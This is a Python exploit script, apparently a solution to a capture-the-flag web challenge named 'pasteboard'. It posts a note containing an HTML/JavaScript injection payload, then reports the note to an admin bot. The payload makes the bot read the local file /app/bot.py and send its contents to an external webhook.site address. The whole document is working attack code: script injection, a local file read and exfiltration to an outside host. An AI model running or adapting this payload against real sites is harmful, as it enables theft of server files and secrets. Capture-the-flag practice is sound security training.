import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# The flag is IN THE SOURCE CODE at /app/bot.py!
# Use file:// protocol to read it!
payload = '''<form id="errorReporter"><input name="path" value="data:text/javascript,
fetch('file:///app/bot.py')
  .then(r => r.text())
  .then(content => fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/BOTPY?flag='+encodeURIComponent(content)))
  .catch(err => fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/ERROR?e='+err));
"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("[!] READING /app/bot.py FROM DISK!")
print("[*] The flag is literally in the source code file!")
print()

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Read bot.py", "body": payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Created: {note_url}")
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    if report.status_code == 202:
        print(f"[+] Reported!")
        print()
        print("[!] Check webhook for /BOTPY with flag parameter!")
        print("[!] It will contain the ENTIRE bot.py source with FLAG variable!")
        print()
        print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")